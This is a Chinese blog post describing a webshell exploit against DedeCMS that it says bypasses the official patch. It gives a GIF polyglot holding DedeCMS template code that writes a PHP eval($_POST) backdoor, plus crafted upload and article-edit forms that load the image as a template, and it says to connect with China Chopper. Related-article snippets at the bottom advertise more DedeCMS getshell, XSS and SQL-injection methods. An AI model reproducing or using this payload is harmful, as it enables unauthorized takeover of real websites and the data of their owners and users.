DEDEcms GET shell 再次通杀 所有版本

最新推荐文章于 2023-05-05 21:26:54 发布
最新推荐文章于 2023-05-05 21:26:54 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: shell class idea input button action
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6292981
版权

还是上次的那个dede getshell 漏洞 ,只不过官方的补丁没有补到位。

现在其基础上,修改图片代码实现最新版本补丁突破。
找一张图片,在保留图片代码的同时,插入如下代码

复制代码
GIF89aGIF89a {dede:name runphp='yes'}
$fp = @fopen("idea4.php", 'a');
@fwrite($fp, '<'.'?php'."/r/n/r/n".'eval($_POST[idea4])'."/r/n/r/n?".">/r/n");
@fclose($fp);
{/dede:name}



利用方法过程:

1.
复制代码
Gif89a{dede:field name='idea4' runphp='yes'} 
@eval($_POST['idea4']); 
{/dede:field}




把上面的代码保存为1.GIF,idea4为一句话密码

2.
复制代码
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">//我在本地环境
<input type="hidden" name="aid" value="7" /> 
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>




构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
本部分内容设定了隐藏,需要回复后才能看到

3.
发表文章,然后构造修改表单如下:
复制代码
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />


/*修改文章,查看源文件,搜索idhash来找 */
复制代码
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />    
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select> 
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>



/*如果是V5.5的,下面是调用验证码的*/

复制代码
<label>验证码:</label>
             <input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
             <img src="http://127.0.0.1/dede//include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" οnclick="this.src=this.src+'?'" />




红色部分都 是需要注意的地方,得根据实际情况进行对应修改。
修改完成后查看文章即可。


然后预览自己发布的文章,用菜刀连接之即可   


做站不容易,大家拿到shell别做过分的事情!测试即可!

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
DeDecms xss 通杀0day 附getshell EXP
weixin_34256074的博客
06-25 203
作者:haris 漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行 目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。 下面说说利用方法。 条件有3个: 1.开启注册 2.开启投稿 3.管理员很勤劳,会去审核文章,最鸡肋的地方了 注册会员—-发表文章 内容填写: <style>@im\port’\http://xxx.co...
dedeCMS后台getshell
qq_45300786的博客
05-12 1620
这里有三种方法 新建webshell和上传webshell 一、上传webshell 二、新建webshell shell工具连接成功 三、在默认模本里写入webshell 然后更新一下 连接shell工具 连上之后,在写入一个新的webshell,记得再把原来页面改回去。 shell工具连接这个系统文件 ...
CVE-2018-9175 DEDECMS后台getshell
weixin_43263451的博客
03-19 1645
基础 dedecms对于输入是首先全局进行过滤的,在/common.inc.php中注册(赋值变量)并过滤外部提交的参数,下图可以看到对输入参数进行addslashes 漏洞分析 首先在 dede\sys_verifies.php的152行 159-160行创建配置文件modifytmp.inc 161-162行给其中写入一些php的头和内容 166行中refiles参数是我们可控的,看起来默认是数组格式,对于refiles里面每一个值从168-180行进行一些操作,注意最重要的是180行,前面都无所谓
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
getshell2aaaaaaaa
最新发布
03-28
### getshell2aaaaaaaa #### 安全领域中的拿Shell技巧概览 在网络安全与渗透测试领域,获取系统或Web应用的“Shell”访问权限是一项重要的技术能力。这不仅有助于安全人员评估系统的安全性,还能帮助他们识别潜在...
herewshow#poc#(CVE-2019-8362)Dedecms v5.7 sp2 后台文件上传 getshell1
07-25
1、首先构造一个文件名为1.jpg.php的文件,内容为 2、将该文件进行压缩 3、在常用操作-文件式管理器处上传压缩文件到soft目录下 5、发布预览
dedecms一键解密工具
10-11
dedecms一键解密工具 用起来方便简单 添加地址直接一键使用 dedecms网络渗透专用
dede ad_js.php getshell,Dedecms 5.7 SP2后台getshell
weixin_27219587的博客
03-29 223
Dedecms 5.7 SP2后台getshell"努力学习才能走上人生巅峰" ——周树人前言最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本dedecms的最新版吧,下载地址:http://www.dedecms.com/products/dedecms/downloads/复现...
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 1025
dedecms后台sql命令写入一句话
批量拿shell
01-22
高手批量拿shell ,有技术没技术都可以看看,绝对是好的教程
dedecms download.php getshell,Dedecms_V5.7 getshell 利用后台文件上传功能漏洞
weixin_30938297的博客
04-02 415
虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试的是utf-8版...
[分析]-DedeCMS版本通杀SQL注入漏洞
代码析构师的专栏
05-09 1788
利用]: http://p2j.cn/?p=798 [补丁]: http://www.dedecms.com/pl/#u20140228_5 ---------------------------------------------------------------------------------------------------------------------
Dedecms 后台getshell 5.7 SP2
3569
01-15 3633
http://foreversong.cn/archives/963 虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~ 因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~ http://www.dedecms.com/products/dedecms/downloads/ Dede
php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
weixin_29863401的博客
03-11 541
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧谷歌批量还需改进 一会儿会补上!原文:http://www.wooyun.org/bug.php?action=view&id=2984测试如下:http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com...
dedecms xss 0day通杀所有版本 可getshell
oceanark的博客
07-13 1770
////////////////////////////////////////////////漏洞虽老,但方法永远不会过时//////////////////////////////////////////////// 漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起
dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 493
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
渗透实战:dedeCMS任意用户密码重置到内网getshell
niobi的博客
05-05 2094
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
dedecmsshell
08-24
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,然后利用ad_add.php文件进行处理,从而获取shell权限。这是一种比较常见的方式,但需要注意的是,这种漏洞只会影响特定版本DedeCMS,且需要具有管理员权限才能进行操作。 除了在广告管理模块中利用漏洞获取shell权限外,还有其他一些常见的方法,比如利用网站管理员的添加插件功能来上传包含恶意代码的插件文件,从而达到获取shell权限的目的。此外,还可以通过执行SQL语句写入webshell的方式,或者利用文件包含的漏洞进行攻击。总的来说,获取DedeCMSshell权限有多种方法,黑客们会根据具体情况选择最适合的方法进行攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Dedecms 5.7 SP2后台getshell](https://blog.csdn.net/he_and/article/details/80890664)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [apache的网站配置目录_网站后台getshell的方法总结](https://blog.csdn.net/weixin_39977776/article/details/110105614)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值